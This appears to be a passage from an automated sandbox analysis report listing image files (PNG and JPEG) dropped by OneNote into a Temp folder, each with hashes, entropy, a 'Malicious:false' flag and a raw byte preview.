                                                                                                                                            SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{538B4E5E-9C30-45EF-9E58-B34D9C43F46D}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2270
                                                                                                                                            Entropy (8bit):7.845368393313232
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                            MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                            SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                            SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                            SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{53B3B008-8952-4476-8A60-16CDBA092B07}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2210
                                                                                                                                            Entropy (8bit):7.86853667196985
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                            MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                            SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                            SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                            SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{54012F50-1A6C-4D61-AB3F-238A0561DB6B}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):17289
                                                                                                                                            Entropy (8bit):7.962998633267186
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                            MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                            SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                            SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                            SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{558AC0CC-697F-4554-8CEF-62BAD375BB1B}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):19235
                                                                                                                                            Entropy (8bit):7.944867159042578
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                            MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                            SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                            SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                            SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{55A3D056-4F5A-45A6-B967-5B8BA42637FA}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4181
                                                                                                                                            Entropy (8bit):7.950380155401321
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                            MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                            SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                            SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                            SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{562ED90E-A9E3-4A97-9043-491DCDCBE1F0}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):59707
                                                                                                                                            Entropy (8bit):7.858445368171059
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:k76rvGc8WKC2/UX1uEgVRY/jvv9CblyL/T:k77Z5C2/Ow1e9CblCT
                                                                                                                                            MD5:47ADB0DF6FDA756920225A099B722322
                                                                                                                                            SHA1:851946B8C2BD0BB351BAEECA9E5BB6648A87D7CA
                                                                                                                                            SHA-256:EC8CD7250F3D82E900E99114869777EE859EC73EFFABED108815F65742078C3A
                                                                                                                                            SHA-512:85A9920E1CE4A2FCCEBAFA425C925DF33580FA3C3C00178F058539B2FBC0163866DB8A41B320E2EF2CD217F00FFA06A1A831C728D3F9F910C9EAC58B5DA76E2D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..A..Qaq"....2........B#..R.b3$..8xrC4&'W.%e.(.c.d.5E6Ff..h..SsTt..u...Gg..H.....................!.1..AQ.aq.".......2..st.BR..56.r#3.b.S.4c%...$d.CT............?....3.7...G:../P....z..K.:6..w......6....... .z7...~.....{gdF60...9....{...'[N....m.........z...g{.......7...4..1..=.z...._..p...m..Icd.~.v..9.P..0Z(.<j.......R6zm.....v.z...>x..)=g........zo{..w..f..y.t.....%.D..#.}.I.>).H.QM..cLD..x.../.^y.{.............y.=^.......I.T.......U..0_?...u..og..3.ky..K....6w...Dc......~........ik.z....N...en......_.....x....._u...4.{..P...>.....}.......>.R.....m.....[mt.....}.........|.....m......~....B.F.]C.36..q....yg...{]...+.DZv.9<.o..;..N.n&im.,....w.3...V.s...Y..e#$.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{57F8E4E9-701A-48B2-A85B-780C1B43F17B}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4190
                                                                                                                                            Entropy (8bit):7.94161730428269
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                            MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                            SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                            SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                            SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{5806526C-DE51-4D00-A2E7-8237E2FA39FA}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):296
                                                                                                                                            Entropy (8bit):6.844511427678902
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:6v/lhPfRF/9916DoPg9nF9mWydqygHn5+QCEcve0AHJks+Qoi36r4up:6v/7BXfrPqTmWyduCE6Iks+biw4c
                                                                                                                                            MD5:33DCA72504D567C57F95452A0358ED2F
                                                                                                                                            SHA1:F97C8896E03EF1C3CC4CD97E263F86C85FC80C31
                                                                                                                                            SHA-256:7E131D7DD2D98E5BF76866FFE0EB5C0AC994E1E791B07F61FB3A756F24D7317C
                                                                                                                                            SHA-512:64E48397171372908B9A5C1459DABE7C41E175CA7A27A064DBE45B747FC0973C6A77DCD77993403D19AAEBC5A92E944382FC3A34C58D5A893510576B2BA453A0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...(...(........m....sRGB.........pHYs...t...t..f.x....IDATXG.Q.. .D.=Y.dz.x..*..~9.X..`...D."|0.[...Y.S..k.}.s#..1nA.f.*.#@.u2.s9..-.f...y_...T...h.........w.=....Gk%JW.v.._L)E}k..r..M2..$"A.D..z. ...P=k..Q...5H.(.T..$A.....;..Y.v?...s1........~.6.N..p4B....IEND.B`.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{58587B56-A639-490B-8A2D-CA1BC2FD058A}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16003
                                                                                                                                            Entropy (8bit):7.959532793770661
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                            MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                            SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                            SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                            SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{58CE7097-1660-45B8-8F48-2775D1A33738}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):296
                                                                                                                                            Entropy (8bit):6.844511427678902
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:6v/lhPfRF/9916DoPg9nF9mWydqygHn5+QCEcve0AHJks+Qoi36r4up:6v/7BXfrPqTmWyduCE6Iks+biw4c
                                                                                                                                            MD5:33DCA72504D567C57F95452A0358ED2F
                                                                                                                                            SHA1:F97C8896E03EF1C3CC4CD97E263F86C85FC80C31
                                                                                                                                            SHA-256:7E131D7DD2D98E5BF76866FFE0EB5C0AC994E1E791B07F61FB3A756F24D7317C
                                                                                                                                            SHA-512:64E48397171372908B9A5C1459DABE7C41E175CA7A27A064DBE45B747FC0973C6A77DCD77993403D19AAEBC5A92E944382FC3A34C58D5A893510576B2BA453A0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...(...(........m....sRGB.........pHYs...t...t..f.x....IDATXG.Q.. .D.=Y.dz.x..*..~9.X..`...D."|0.[...Y.S..k.}.s#..1nA.f.*.#@.u2.s9..-.f...y_...T...h.........w.=....Gk%JW.v.._L)E}k..r..M2..$"A.D..z. ...P=k..Q...5H.(.T..$A.....;..Y.v?...s1........~.6.N..p4B....IEND.B`.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{5A59FF87-BDEE-4981-A694-580BDC7321C7}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2332
                                                                                                                                            Entropy (8bit):7.8822150338370776
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                            MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                            SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                            SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                            SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{5AC69409-DBAB-410A-9120-6F7DDBFC7A89}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22203
                                                                                                                                            Entropy (8bit):6.977175130747846
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
                                                                                                                                            MD5:2D3128554F6286809B2C8E99DE5FD3F6
                                                                                                                                            SHA1:FC42CB04151D36F448093BDEFE33031A9B8D797D
                                                                                                                                            SHA-256:14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
                                                                                                                                            SHA-512:D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....XExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&...........*.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{5B7228E6-B007-4602-B24C-6F4E5268684E}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2599
                                                                                                                                            Entropy (8bit):7.903700862190034
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                            MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                            SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                            SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                            SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                            Malicious:false
